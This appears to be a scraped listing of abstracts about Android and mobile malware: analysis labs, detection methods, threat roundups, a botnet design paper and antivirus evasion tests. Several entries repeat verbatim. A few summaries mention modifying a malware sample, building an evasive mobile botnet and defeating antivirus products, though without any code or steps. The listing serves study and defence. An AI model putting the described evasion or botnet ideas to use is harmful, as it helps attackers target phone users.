The document discusses analyzing Android malware. It describes setting up a lab with an Android SDK virtual machine. Tools for static and dynamic analysis are outlined. The document then demonstrates analyzing a malware sample that sends SMS messages to a premium rate number, extracting the APK, decompiling the code, and identifying the malicious behavior. By reversing the malware, the author was able to determine the phone number and text messages it was sending, thus "having" the malware and being able to control it.
The document summarizes Trend Micro's 2012 Mobile Threat and Security Roundup. It found that in 2012 there was a significant increase in detected Android malware, reaching 350,000 samples by year's end. Premium service abusers that charge users fraudulent fees were the most common mobile threat. The document also notes that threats are increasing in sophistication, with cybercriminals developing new methods of attacking users beyond traditional social engineering. As Android grows in popularity, it faces similar threats to what Windows faced as the dominant desktop platform.
Android Malware: Study and analysis of malware for privacy leak in ad-hoc net...IOSR Journals
This document discusses analyzing Android malware that can leak privacy information in ad-hoc networks. It proposes using static and dynamic analysis methods to detect malware. In static analysis, reverse engineering is used to detect malicious code by decompiling Android app install files. In dynamic analysis, apps are run in an emulator to monitor their network behavior using tools like Snort. Destinations are then white-listed or blacklisted based on safety. The approach is compared to third party apps and is shown to also be effective at detecting malware that uses internet permissions to leak privacy data in small datasets.
Harsimran Walia presents information on analyzing Android malware. He discusses how the Android platform has become very popular for attackers due to its large market share and less restrictive development environment compared to iOS. He outlines different types of Android malware like data stealers and rooting malware. The paper also provides details on setting up a malware analysis lab and introduces both static and dynamic analysis tools. It then demonstrates the analysis process on a real premium SMS sending malware sample, showing how to decompile, modify, and test the malware.
ANDROID UNTRUSTED DETECTION WITH PERMISSION BASED SCORING ANALYSISijitcs
Android smart phone is one of the fast growing mobile phones and because of these it the one of the most preferred target of malware developer. Malware apps can penetrate the device and gain privileges in which it can perform malicious activities such reading user contact, misusing of private information such as sending SMS and can harm user by exploiting the users private data which is stored in the device. The study is about implementation of detecting untrusted on android applications, which would be the basis of all future development regarding malware detection.
The smartphone users worldwide are not aware of the permissions as the basis of all malicious activities that could possibly operate in an android system and may steal personal and private information. Android operating system is an open system in which users are allowed to install application from any unsafe sites. However permission mechanism of and android system is not enough to guarantee the invulnerability of the application that can harm the user. In this paper, the permission scoring-based analysis that will scrutinized the installed permission and allows user to increase the efficiency of Android permission to inform user about the risk of the installed Android application, in this paper, the framework that would classify the level of sensitivity of the permission access by the application. The framework uses a formula that will calculate the sensitivity level of the permission and determine if the installed application is untrusted or not. Our result show that, in a collection of 26 untrusted application, the framework is able to correct and determine the application's behavior consistently and efficiently.
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET Journal
This document summarizes methods for detecting Android ransomware through static, dynamic, and hybrid analysis approaches. Static analysis involves analyzing an Android app's code and resources without executing it. Some key static analysis techniques discussed are permission analysis, text analysis to search for ransomware keywords, and code analysis to check for encryption or screen locking behavior. Dynamic analysis executes the app and monitors its runtime behavior. Hybrid analysis combines both static and dynamic techniques. The document outlines several studies that have proposed and evaluated different static, dynamic, and hybrid analysis methods for detecting Android ransomware.
"I haz you and pwn your maal" by Harsimran Walia @b44nz0r at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
The document summarizes Trend Micro's 2012 Mobile Threat and Security Roundup. It found that in 2012 there was a significant increase in detected Android malware, reaching 350,000 samples by year's end. Premium service abusers that charge users fraudulent fees were the most common mobile threat. The document also notes that threats are increasing in sophistication, with cybercriminals developing new methods of attacking users beyond traditional social engineering. As Android grows in popularity, it faces similar threats to what Windows faced as the dominant desktop platform.
Android Malware: Study and analysis of malware for privacy leak in ad-hoc net...IOSR Journals
This document discusses analyzing Android malware that can leak privacy information in ad-hoc networks. It proposes using static and dynamic analysis methods to detect malware. In static analysis, reverse engineering is used to detect malicious code by decompiling Android app install files. In dynamic analysis, apps are run in an emulator to monitor their network behavior using tools like Snort. Destinations are then white-listed or blacklisted based on safety. The approach is compared to third party apps and is shown to also be effective at detecting malware that uses internet permissions to leak privacy data in small datasets.
Harsimran Walia presents information on analyzing Android malware. He discusses how the Android platform has become very popular for attackers due to its large market share and less restrictive development environment compared to iOS. He outlines different types of Android malware like data stealers and rooting malware. The paper also provides details on setting up a malware analysis lab and introduces both static and dynamic analysis tools. It then demonstrates the analysis process on a real premium SMS sending malware sample, showing how to decompile, modify, and test the malware.
ANDROID UNTRUSTED DETECTION WITH PERMISSION BASED SCORING ANALYSISijitcs
Android smart phone is one of the fast growing mobile phones and because of these it the one of the most preferred target of malware developer. Malware apps can penetrate the device and gain privileges in which it can perform malicious activities such reading user contact, misusing of private information such as sending SMS and can harm user by exploiting the users private data which is stored in the device. The study is about implementation of detecting untrusted on android applications, which would be the basis of all future development regarding malware detection.
The smartphone users worldwide are not aware of the permissions as the basis of all malicious activities that could possibly operate in an android system and may steal personal and private information. Android operating system is an open system in which users are allowed to install application from any unsafe sites. However permission mechanism of and android system is not enough to guarantee the invulnerability of the application that can harm the user. In this paper, the permission scoring-based analysis that will scrutinized the installed permission and allows user to increase the efficiency of Android permission to inform user about the risk of the installed Android application, in this paper, the framework that would classify the level of sensitivity of the permission access by the application. The framework uses a formula that will calculate the sensitivity level of the permission and determine if the installed application is untrusted or not. Our result show that, in a collection of 26 untrusted application, the framework is able to correct and determine the application's behavior consistently and efficiently.
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET Journal
This document summarizes methods for detecting Android ransomware through static, dynamic, and hybrid analysis approaches. Static analysis involves analyzing an Android app's code and resources without executing it. Some key static analysis techniques discussed are permission analysis, text analysis to search for ransomware keywords, and code analysis to check for encryption or screen locking behavior. Dynamic analysis executes the app and monitors its runtime behavior. Hybrid analysis combines both static and dynamic techniques. The document outlines several studies that have proposed and evaluated different static, dynamic, and hybrid analysis methods for detecting Android ransomware.
"I haz you and pwn your maal" by Harsimran Walia @b44nz0r at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
Review on mobile threats and detection techniquesijdpsjournal
Since last-decade, smart-phones have gained widespread usage. Mobile devices store personal details
such as contacts and text messages. Due to this extensive growth, smart-phones are attracted towards
cyber-criminals. In this research work, we have done a systematic review of the terms related to malware
detection algorithms and have also summarized behavioral description of some known mobile malwares
in tabular form. After careful solicitation of all the possible methods and algorithms for detection of
mobile-based malwares, we give some recommendations for designing future malware detection algorithm
by considering computational complexity and detection ration of mobile malwares.
Tech Report: On the Effectiveness of Malware Protection on AndroidFraunhofer AISEC
This document evaluates the effectiveness of malware protection on Android devices. It conducts tests on several Android antivirus apps using known malware samples and a newly developed proof of concept malware. The tests find that most antivirus apps can be easily evaded by making only trivial alterations to malware package files. The document aims to provide a more realistic assessment of the malware risk and the level of protection offered by antivirus software compared to traditional antivirus tests.
The document summarizes various cybersecurity incidents that occurred in July 2021. It reports on ransomware attacks against Fujifilm in Japan and UnitingCare Queensland in Australia. It also discusses data breaches affecting Alibaba, CVS Health, and Cisco vulnerabilities being exploited. New malware such as DarkRadiation ransomware targeting Linux and the return of Agent Tesla RAT in COVID-19 vaccine phishing scams. The gaming, technology, healthcare and government sectors were most affected. Attack vectors included ransomware, data leaks, malware/trojans and exploitation of known vulnerabilities. Consequences involved encryption of systems and files, theft of personally identifiable information and system compromise.
Taxonomy mobile malware threats and detection techniquescsandit
Since last-decade, smart-phones have gained widespr
ead usage. Mobile devices store personal
details such as contacts and text messages. Due to
this extensive growth, smart-phones are
attracted towards cyber-criminals. In this research
work, we have done a systematic review of
the terms related to malware detection algorithms
and have also summarized behavioral
description of some known mobile malwares in tabula
r form. After careful solicitation of all the
possible methods and algorithms for detection of m
obile-based malwares, we give some
recommendations for designing future malware detect
ion algorithm by considering
computational complexity and detection ration of m
obile malwares.
The document provides an overview of security testing techniques for mobile applications on various platforms including Android, BlackBerry, and iOS. It discusses topics such as application threat models, traffic analysis and manipulation, insecure data storage, reverse engineering application binaries, analyzing application components and runtime behavior. The goal is to identify vulnerabilities that could impact the confidentiality, integrity or availability of the mobile application or user data.
This document summarizes predictions for cyber threats in 2013 from McAfee Labs researchers. They predict:
- Mobile worms that buy malicious apps and steal payment info using NFC. Malware that blocks security updates on phones. Ransomware "kits" for mobile.
- Covert, persistent attacks targeting below the kernel of Windows. Rapid development of ways to attack the new Windows 8 and HTML5.
- Large-scale infrastructure attacks like Stuxnet. Highly targeted attacks using the Citadel Trojan to evade detection. Malware that reconnects after botnets are taken down.
The document discusses various threats facing iOS and Android mobile devices and point-of-sale systems. It describes attacks such as jailbreaking iOS devices to install surveillance apps, using stolen certificates to sideload malicious apps, exploiting Android vulnerabilities, and using WiFi man-in-the-middle attacks. It promotes BETTER Mobile Security's solution which continuously monitors devices for unauthorized activity and configuration changes to detect and prevent these advanced threats in real-time.
Comilion aims to create the first crowd-sourcing platform for mobile app vulnerability assessment and dynamic app permission management. The founders have extensive experience in cyber security and IT management. Comilion's technology will offer app risk evaluation and recommendations to help secure private and work data on devices in BYOD environments. The company is seeking $1M to launch consumer and enterprise products and establish partnerships with mobile device management providers.
This document discusses mobile malware and how to protect against it. It begins by defining malware and listing common types. It then provides statistics on the distribution of mobile operating systems and malware detections. The document outlines sources of mobile malware infections and discusses why mobile devices contain sensitive information. It recommends implementing mobile device management to centrally manage devices and deploy security policies. Examples of recent mobile threats are also described. The document concludes by recommending security best practices like using antivirus software, updating devices, and educating users.
TrendLabs 2012 Annual Security Roundup: Evolved Threats in a “Post-PC” WorldInfinigate Group
In 2012, cybercriminals increasingly targeted mobile devices like Android smartphones and embraced new platforms beyond PCs. The number of Android malware grew explosively to over 350,000, mirroring the growth of the Android OS. Data breaches and targeted attacks continued at an alarming rate, with the cost of the Global Payments breach reaching $94 million. Cybercriminals also refined existing attack methods, with ransomware, automatic transfer systems, and the Blackhole Exploit Kit all becoming more sophisticated. While zero-day vulnerabilities still emerged, attackers also effectively exploited older vulnerabilities since many systems remained unpatched.
The document contains summaries of several security news articles. The articles discuss issues like vulnerabilities in iPhone fingerprint authentication and signed Mac malware, flaws in Verizon femtocells allowing eavesdropping, a remote access tool targeting Android devices, and vulnerabilities in a Ukrainian bank's mobile app allowing account theft. The document also mentions several upcoming security events in India.
“Design and Detection of Mobile Botnet Attacks”iosrjce
A mobile botnet is a type of bot that runs automatically when installed on a mobile phone, which
does not have any anti-malware. The botnet gains complete access over our mobile device. The common
propagation medium for smartphone based botnet attacks are SMS, Bluetooth and Wi-Fi. In our project, we will
demonstrate a SMS-cum-Wi-Fi based mobile botnet using a centralized C&C server. The botmaster initiates
commands to C&C server and the C&C propagates to infected smartphones i.e. bots. We will try to develop a
network which cannot be detected easily and propagates fast. The target of the propagation will be Android
Operating System. For detection, an application is created to detect whether smartphone is working as bot or
not. In this, we guide user about possible botnet attacks.
Mobile Threats and Trends Changing Mobile App SecurityDevOps.com
Deploying your high-value mobile app to untrusted environments such as consumer mobile devices can be a risky proposition. Are some of your customers’ devices compromised? Do your users also download apps from untrusted sources? Is there malware residing on their devices that target apps such as yours?
Despite your best efforts to code secure apps, assess their security posture, and remediate any identified vulnerabilities – it’s not quite enough in today’s mobile threat landscape. Safeguarding mobile apps during runtime and empowering them to protect themselves in hostile environments is becoming a necessity in the face of ever-evolving mobile attack tactics and techniques.
During this webinar, we will:
Discuss today’s mobile app threat landscape
Explain how changing distribution models (e.g., Fortnite for Android) affect your app’s security
Illustrate the potential financial impact of mobile threats on a business’s bottom line
Demonstrate mobile overlay and other attacks
Reveal how mobile apps can protect themselves against these attacks with app shielding and runtime protection
This document summarizes the design and detection of mobile botnet attacks. It begins by defining a mobile botnet and how they can gain access to mobile devices without anti-malware. It then discusses the history of mobile botnets and some of the challenges in designing effective SMS-based mobile botnets that can evade detection. The document proposes a SMS and WiFi based heterogeneous mobile botnet model using a centralized command and control server. It outlines the methodology for both designing the mobile botnet and detecting whether a smartphone is operating as a bot. Steps for designing and detecting the botnet are provided along with discussing the usefulness and concluding that more work is needed to track down botmasters and develop generalized guidelines.
Malware detection techniques for mobile devicesijmnct
Mobile devices have become very popular nowadays, due to is portability and high performance, a mobile device became a must device for persons using information and communication technologies. In addition to hardware rapid evolution, mobile applications are also increasing in their complexity and performance to cover most the needs of their users. Both software and hardware design focused on increasing performance and the working hours of a mobile device. Different mobile operating systems are being used today with different platforms and different market shares. Like all information systems, mobile systems are prone to malware attacks. Due to
the personality feature of mobile devices, malware detection is very important and is a must tool in each device to protect private data and mitigate attacks. In
this paper, we will study and analyze different malware detection techniques used for mobile operating systems. We will focus on the to two competing mobile operating systems – Android and iOS. We will asset each technique summarizing its advantages and disadvantages. The aim of the work is to establish a basis for developing a mobile malware detection tool based on user profiling.
MALWARE DETECTION TECHNIQUES FOR MOBILE DEVICESijmnct
Mobile devices have become very popular nowadays, due to is portability and high performance, a mobile
device became a must device for persons using information and communication technologies. In addition to
hardware rapid evolution, mobile applications are also increasing in their complexity and performance to
cover most the needs of their users. Both software and hardware design focused on increasing performance
and the working hours of a mobile device. Different mobile operating systems are being used today with
different platforms and different market shares. Like all information systems, mobile systems are prone to
malware attacks. Due to the personality feature of mobile devices, malware detection is very important and
is a must tool in each device to protect private data and mitigate attacks. In this paper, we will study and
analyze different malware detection techniques used for mobile operating systems. We will focus on the to
two competing mobile operating systems – Android and iOS. We will asset each technique summarizing its
advantages and disadvantages. The aim of the work is to establish a basis for developing a mobile malware
detection tool based on user profiling.
Mobile application security testing is important to identify vulnerabilities and protect sensitive user data. The key concepts of mobile app security testing include authentication, authorization, availability, confidentiality, integrity and non-repudiation. Common mobile security threats include malware, spyware, privacy threats and vulnerable applications. Effective security testing employs strategies like strong authentication, encryption, access control and session management. The testing methodology involves profiling the app, analyzing threats, planning tests, executing tests, and providing daily status reports. Deliverables include management reports, technical vulnerability reports, and best practices documents.
This document provides an overview of mobile application security testing. It discusses the mobile security stack including the infrastructure, hardware, operating system and application layers. It then covers topics like mobile threat modeling, mobile application auditing techniques including dynamic and static analysis. The document also discusses the OWASP top 10 mobile risks and provides case studies and demonstrations on pentesting real mobile applications and reverse engineering Android malware.
This document provides an overview of 16 dynamic analysis platforms for analyzing Android applications and detecting malware. It evaluates these platforms' effectiveness using known malware samples and known Android bugs. The results show low diversity among platforms due to code reuse, making them vulnerable to evasion. Additionally, the platforms could be exploited by malware using the Master Key bugs to hide malicious behavior.
The document discusses security issues with Android applications. It notes that while Android was designed with security in mind through privilege separation for apps, applications are granted permissions upon installation that are not checked again, allowing potential misuse. This could allow bad actors to convince users to install apps that access private information. The document also notes that Android malware has increased significantly in recent years, with over 100,000 detected in 2012. It introduces Trend Micro's Mobile App Reputation service, which analyzes apps for malware, privacy risks, and performance issues to provide reputation scores and reports to app stores.
Review on mobile threats and detection techniquesijdpsjournal
Since last-decade, smart-phones have gained widespread usage. Mobile devices store personal details
such as contacts and text messages. Due to this extensive growth, smart-phones are attracted towards
cyber-criminals. In this research work, we have done a systematic review of the terms related to malware
detection algorithms and have also summarized behavioral description of some known mobile malwares
in tabular form. After careful solicitation of all the possible methods and algorithms for detection of
mobile-based malwares, we give some recommendations for designing future malware detection algorithm
by considering computational complexity and detection ration of mobile malwares.
Tech Report: On the Effectiveness of Malware Protection on AndroidFraunhofer AISEC
This document evaluates the effectiveness of malware protection on Android devices. It conducts tests on several Android antivirus apps using known malware samples and a newly developed proof of concept malware. The tests find that most antivirus apps can be easily evaded by making only trivial alterations to malware package files. The document aims to provide a more realistic assessment of the malware risk and the level of protection offered by antivirus software compared to traditional antivirus tests.
The document summarizes various cybersecurity incidents that occurred in July 2021. It reports on ransomware attacks against Fujifilm in Japan and UnitingCare Queensland in Australia. It also discusses data breaches affecting Alibaba, CVS Health, and Cisco vulnerabilities being exploited. New malware such as DarkRadiation ransomware targeting Linux and the return of Agent Tesla RAT in COVID-19 vaccine phishing scams. The gaming, technology, healthcare and government sectors were most affected. Attack vectors included ransomware, data leaks, malware/trojans and exploitation of known vulnerabilities. Consequences involved encryption of systems and files, theft of personally identifiable information and system compromise.
Taxonomy mobile malware threats and detection techniquescsandit
Since last-decade, smart-phones have gained widespr
ead usage. Mobile devices store personal
details such as contacts and text messages. Due to
this extensive growth, smart-phones are
attracted towards cyber-criminals. In this research
work, we have done a systematic review of
the terms related to malware detection algorithms
and have also summarized behavioral
description of some known mobile malwares in tabula
r form. After careful solicitation of all the
possible methods and algorithms for detection of m
obile-based malwares, we give some
recommendations for designing future malware detect
ion algorithm by considering
computational complexity and detection ration of m
obile malwares.
The document provides an overview of security testing techniques for mobile applications on various platforms including Android, BlackBerry, and iOS. It discusses topics such as application threat models, traffic analysis and manipulation, insecure data storage, reverse engineering application binaries, analyzing application components and runtime behavior. The goal is to identify vulnerabilities that could impact the confidentiality, integrity or availability of the mobile application or user data.
This document summarizes predictions for cyber threats in 2013 from McAfee Labs researchers. They predict:
- Mobile worms that buy malicious apps and steal payment info using NFC. Malware that blocks security updates on phones. Ransomware "kits" for mobile.
- Covert, persistent attacks targeting below the kernel of Windows. Rapid development of ways to attack the new Windows 8 and HTML5.
- Large-scale infrastructure attacks like Stuxnet. Highly targeted attacks using the Citadel Trojan to evade detection. Malware that reconnects after botnets are taken down.
The document discusses various threats facing iOS and Android mobile devices and point-of-sale systems. It describes attacks such as jailbreaking iOS devices to install surveillance apps, using stolen certificates to sideload malicious apps, exploiting Android vulnerabilities, and using WiFi man-in-the-middle attacks. It promotes BETTER Mobile Security's solution which continuously monitors devices for unauthorized activity and configuration changes to detect and prevent these advanced threats in real-time.
Comilion aims to create the first crowd-sourcing platform for mobile app vulnerability assessment and dynamic app permission management. The founders have extensive experience in cyber security and IT management. Comilion's technology will offer app risk evaluation and recommendations to help secure private and work data on devices in BYOD environments. The company is seeking $1M to launch consumer and enterprise products and establish partnerships with mobile device management providers.
This document discusses mobile malware and how to protect against it. It begins by defining malware and listing common types. It then provides statistics on the distribution of mobile operating systems and malware detections. The document outlines sources of mobile malware infections and discusses why mobile devices contain sensitive information. It recommends implementing mobile device management to centrally manage devices and deploy security policies. Examples of recent mobile threats are also described. The document concludes by recommending security best practices like using antivirus software, updating devices, and educating users.
TrendLabs 2012 Annual Security Roundup: Evolved Threats in a “Post-PC” WorldInfinigate Group
In 2012, cybercriminals increasingly targeted mobile devices like Android smartphones and embraced new platforms beyond PCs. The number of Android malware grew explosively to over 350,000, mirroring the growth of the Android OS. Data breaches and targeted attacks continued at an alarming rate, with the cost of the Global Payments breach reaching $94 million. Cybercriminals also refined existing attack methods, with ransomware, automatic transfer systems, and the Blackhole Exploit Kit all becoming more sophisticated. While zero-day vulnerabilities still emerged, attackers also effectively exploited older vulnerabilities since many systems remained unpatched.
The document contains summaries of several security news articles. The articles discuss issues like vulnerabilities in iPhone fingerprint authentication and signed Mac malware, flaws in Verizon femtocells allowing eavesdropping, a remote access tool targeting Android devices, and vulnerabilities in a Ukrainian bank's mobile app allowing account theft. The document also mentions several upcoming security events in India.
“Design and Detection of Mobile Botnet Attacks”iosrjce
A mobile botnet is a type of bot that runs automatically when installed on a mobile phone, which
does not have any anti-malware. The botnet gains complete access over our mobile device. The common
propagation medium for smartphone based botnet attacks are SMS, Bluetooth and Wi-Fi. In our project, we will
demonstrate a SMS-cum-Wi-Fi based mobile botnet using a centralized C&C server. The botmaster initiates
commands to C&C server and the C&C propagates to infected smartphones i.e. bots. We will try to develop a
network which cannot be detected easily and propagates fast. The target of the propagation will be Android
Operating System. For detection, an application is created to detect whether smartphone is working as bot or
not. In this, we guide user about possible botnet attacks.
Mobile Threats and Trends Changing Mobile App SecurityDevOps.com
Deploying your high-value mobile app to untrusted environments such as consumer mobile devices can be a risky proposition. Are some of your customers’ devices compromised? Do your users also download apps from untrusted sources? Is there malware residing on their devices that target apps such as yours?
Despite your best efforts to code secure apps, assess their security posture, and remediate any identified vulnerabilities – it’s not quite enough in today’s mobile threat landscape. Safeguarding mobile apps during runtime and empowering them to protect themselves in hostile environments is becoming a necessity in the face of ever-evolving mobile attack tactics and techniques.
During this webinar, we will:
Discuss today’s mobile app threat landscape
Explain how changing distribution models (e.g., Fortnite for Android) affect your app’s security
Illustrate the potential financial impact of mobile threats on a business’s bottom line
Demonstrate mobile overlay and other attacks
Reveal how mobile apps can protect themselves against these attacks with app shielding and runtime protection
This document summarizes the design and detection of mobile botnet attacks. It begins by defining a mobile botnet and how they can gain access to mobile devices without anti-malware. It then discusses the history of mobile botnets and some of the challenges in designing effective SMS-based mobile botnets that can evade detection. The document proposes a SMS and WiFi based heterogeneous mobile botnet model using a centralized command and control server. It outlines the methodology for both designing the mobile botnet and detecting whether a smartphone is operating as a bot. Steps for designing and detecting the botnet are provided along with discussing the usefulness and concluding that more work is needed to track down botmasters and develop generalized guidelines.
Malware detection techniques for mobile devicesijmnct
Mobile devices have become very popular nowadays, due to is portability and high performance, a mobile device became a must device for persons using information and communication technologies. In addition to hardware rapid evolution, mobile applications are also increasing in their complexity and performance to cover most the needs of their users. Both software and hardware design focused on increasing performance and the working hours of a mobile device. Different mobile operating systems are being used today with different platforms and different market shares. Like all information systems, mobile systems are prone to malware attacks. Due to
the personality feature of mobile devices, malware detection is very important and is a must tool in each device to protect private data and mitigate attacks. In
this paper, we will study and analyze different malware detection techniques used for mobile operating systems. We will focus on the to two competing mobile operating systems – Android and iOS. We will asset each technique summarizing its advantages and disadvantages. The aim of the work is to establish a basis for developing a mobile malware detection tool based on user profiling.
MALWARE DETECTION TECHNIQUES FOR MOBILE DEVICESijmnct
Mobile devices have become very popular nowadays, due to is portability and high performance, a mobile
device became a must device for persons using information and communication technologies. In addition to
hardware rapid evolution, mobile applications are also increasing in their complexity and performance to
cover most the needs of their users. Both software and hardware design focused on increasing performance
and the working hours of a mobile device. Different mobile operating systems are being used today with
different platforms and different market shares. Like all information systems, mobile systems are prone to
malware attacks. Due to the personality feature of mobile devices, malware detection is very important and
is a must tool in each device to protect private data and mitigate attacks. In this paper, we will study and
analyze different malware detection techniques used for mobile operating systems. We will focus on the to
two competing mobile operating systems – Android and iOS. We will asset each technique summarizing its
advantages and disadvantages. The aim of the work is to establish a basis for developing a mobile malware
detection tool based on user profiling.
Mobile application security testing is important to identify vulnerabilities and protect sensitive user data. The key concepts of mobile app security testing include authentication, authorization, availability, confidentiality, integrity and non-repudiation. Common mobile security threats include malware, spyware, privacy threats and vulnerable applications. Effective security testing employs strategies like strong authentication, encryption, access control and session management. The testing methodology involves profiling the app, analyzing threats, planning tests, executing tests, and providing daily status reports. Deliverables include management reports, technical vulnerability reports, and best practices documents.
This document provides an overview of mobile application security testing. It discusses the mobile security stack including the infrastructure, hardware, operating system and application layers. It then covers topics like mobile threat modeling, mobile application auditing techniques including dynamic and static analysis. The document also discusses the OWASP top 10 mobile risks and provides case studies and demonstrations on pentesting real mobile applications and reverse engineering Android malware.
This document provides an overview of 16 dynamic analysis platforms for analyzing Android applications and detecting malware. It evaluates these platforms' effectiveness using known malware samples and known Android bugs. The results show low diversity among platforms due to code reuse, making them vulnerable to evasion. Additionally, the platforms could be exploited by malware using the Master Key bugs to hide malicious behavior.
The document discusses security issues with Android applications. It notes that while Android was designed with security in mind through privilege separation for apps, applications are granted permissions upon installation that are not checked again, allowing potential misuse. This could allow bad actors to convince users to install apps that access private information. The document also notes that Android malware has increased significantly in recent years, with over 100,000 detected in 2012. It introduces Trend Micro's Mobile App Reputation service, which analyzes apps for malware, privacy risks, and performance issues to provide reputation scores and reports to app stores.
The document discusses malware detection and prevention techniques for smart devices. It begins with an introduction to the growing threat of malware targeting smart devices, especially Android devices. It then provides an overview of security models for various mobile operating systems. The document also covers malware analysis techniques, including static analysis of code and dynamic analysis of behaviors. It discusses signature-based and anomaly-based malware detection methods. Finally, it proposes combining static and dynamic analysis techniques into a hybrid analysis approach to improve malware detection.
The document discusses malware improvements on Android OS. It provides an introduction to the growth of smartphones and Android's dominance of the market. It then covers the organization of the paper and defines malware. It reviews the Android OS architecture and literature on Android security. The objectives are to increase awareness of the Android security model and analyze malware development. The findings show Android security relies on user awareness and the open source nature makes it vulnerable. Future scopes include modifying the permission model and alpha testing apps for the Play Store.
Android Malware Detection Literature ReviewAhmed Sabbah
This document provides an overview of Android malware detection approaches based on a literature review. It discusses static, dynamic, and hybrid analysis methods. Static methods examine app components and code without execution. Dynamic methods monitor running apps to log behaviors like API calls and network traffic. Hybrid approaches combine static and dynamic analysis. The document also outlines limitations like evasion techniques, lack of real device testing, and privacy concerns. It recommends future work in areas like improving machine learning models, detecting zero-day attacks, and preserving user privacy during dynamic analysis.
The document summarizes a research paper that studied detecting malicious Android applications in official and third-party Android app markets. The researchers developed a system called DroidRanger that uses permission-based filtering and behavioral analysis to detect both known and unknown malware. DroidRanger revealed 211 malicious apps total, with 32 from the official market and 179 from alternative markets. It also discovered a sophisticated zero-day malware with 40 samples, 11 of which were in the official market.
This document summarizes a review of behavior-based malware analysis for Android. It discusses existing stochastic epidemic models for malware detection that are complex. The proposed system abstracts program behaviors and compares them to reference malware behaviors to detect suspicious activities. It analyzes apps, represents them as trace languages abstracted according to behavior patterns, and detects malware by comparing to a malware database. The system gets installed apps, running tasks, extracts permission information, and detects malware to help users identify potentially malicious apps.
Android open-source operating System for mobile devicesIOSR Journals
This document provides an overview of the Android operating system and its security features. It discusses Android's architecture, including its use of the Linux kernel and Dalvik virtual machine. Key security aspects are summarized, such as the permission model and limitations of running apps within a sandbox. The document also introduces an exploit execution framework that can test Android devices for vulnerabilities. It concludes by discussing how malware may propagate on Android devices and potential future threats.
A Study on Modern Methods for Detecting Mobile MalwareIRJET Journal
This document discusses modern methods for detecting mobile malware. It begins by providing background on the growth of mobile malware attacks and outlines some common types of mobile malware like Trojans, banking trojans, backdoors, ransomware, hybrid malware, botnets, spyware, and cryptocurrency mining malware. It then compares the architectures of the Android and iOS operating systems. The document analyzes mobile malware and details various detection techniques, categorizing them as signature-based, behavior-based, permission-based, or hybrid techniques. It evaluates the effectiveness and usability of different research approaches for mobile malware detection.
A case study of malware detection and removal in android appsijmnct
With the proliferation of smart phone users, android malware variants is increasing in terms of numbers
and amount of new victim android apps. The traditional malware detection focuses on repackage,
obfuscate and/or other transformable executable code from malicious apps. This paper presented a case
study on existing android malware detection through a sequence of steps and well developed encoding SMS
message. Our result has demonstrated a solid testify of our approach in the effectiveness of malware
detection and removal.
HONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROIDIJCNCJournal
1. The document presents HoneypotLabsac, a virtual honeypot framework for Android that aims to learn more about targeted mobile device attacks.
2. The framework allows emulating services like telnet, HTTP, and SMS to collect log data from interactions without compromising the actual device.
3. HoneypotLabsac generates log files of all emulated service connections and SMS messages, stores them on the device, and sends them periodically to a log server for analysis.
Evaluating android antimalware against transformation attacksIAEME Publication
This document summarizes a study that evaluated the effectiveness of 10 popular commercial Android antimalware products against common malware transformation techniques. The researchers developed a framework called DroidChameleon that applied various obfuscation techniques to known malware samples to generate new variants. They found that none of the antimalware products were resistant to these basic transformations, and many could be trivially defeated. The researchers hope their findings will motivate the security community to improve current mobile malware detection capabilities.
Countering mobile malware in CSP’s network. Android honeypot as anti-fraud so...Denis Gorchakov
Honeypot is used for botnet analysis, traffic capturing and revealing C&C hostnames. It’s also used for detecting subscribers with infected devices and monitoring malware activities like funds withdrawal and remote control.
This document discusses a tool called ALTERDROID that analyzes Android applications to detect malware. ALTERDROID uses static and dynamic analysis techniques to detect obfuscated malware hidden in applications. It analyzes applications that are installed on a device to identify any malicious components. If malware is found, it asks the user for permission to uninstall the application. For unauthorized users attempting to access the device, it captures their image and sends it by email. The document compares this approach to existing static-only malware analysis techniques, which can miss hidden malicious components.
Mobile security is one of the most important
aspect when it comes to keeping our data secure from any
external attack like phishing, data hacking and many other
attacks that can have very disastrous effects that may also
lead to social disturbance, as in one’s private data can be
made public by the attackers.
IRJET - System to Identify and Define Security Threats to the users About The...IRJET Journal
The document describes a proposed system called "MobiSecure" that would identify and define security threats from illegitimate installed applications on Android devices. It aims to scan a device's memory for applications downloaded from unknown sources that could enable cyberattacks. The system would detect such applications, inform the user, and allow deleting the application to mitigate risks. It has modules for scanning devices, displaying results with threat descriptions, and removing flagged applications. The system architecture is designed to identify malware-containing applications installed without user knowledge to help decrease cyber threats.
MACHINE LEARNING APPROACH TO LEARN AND DETECT MALWARE IN ANDROIDIRJET Journal
This document discusses machine learning approaches for detecting malware in Android apps. It first classifies different types of malware like viruses, trojans, worms, spyware, adware, and ransomware. It then discusses important features for malware detection like n-grams, opcodes, strings, memory access, and API calls. The document reviews several papers on machine learning techniques for Android malware detection using methods like random forest, SVM, decision trees, and evaluating accuracy and efficiency. It proposes using ANN and SVM models to identify malicious and benign apps and providing a category-based machine learning approach to improve detection accuracy.
Top Mobile Application Penetration Testing Tools for Android and iOS.pdfElanusTechnologies
Mobile application penetration testing is used to evaluate the security of native mobile apps developed for Android and iOS. It involves testing data security both at rest and in transit, as well as identifying vulnerabilities using automated tools and manual techniques. Penetration testing can locate flaws in code, systems, applications, databases, and APIs to harden apps and prevent hackers from exploiting vulnerabilities. The document provides a list of important mobile application penetration testing tools for Android and iOS.
Android is an open-source software stack that includes an operating system for mobile devices. It was developed by Google and the Open Handset Alliance and uses the Java programming language. Android apps can pose security threats such as malware, drive-by exploits, and vulnerabilities in the web browser. The Android security model uses sandboxes, permissions, and signatures to protect each app's data. Users can also take precautions like only installing apps from trusted sources, checking app permissions, and using antivirus software.
This document discusses the importance of mobile application security and penetration testing. It describes penetration testing as discovering vulnerabilities before attackers through vulnerability detection, comprehensive penetration attempts, and analysis/reporting. The document outlines static and dynamic analysis methods used for Android application security assessments. These include code review, function hooking, runtime debugging, and analyzing data at rest and in transit. It promotes understanding how applications work through reverse engineering, decompilation, and deobfuscation. The methodology uses tools like MARA, MobSF, Xposed, Frida, and BurpSuite.
Similar to I haz you and pwn your maal whitepaper (20)
How to Fix the Import Error in the Odoo 17Celine George
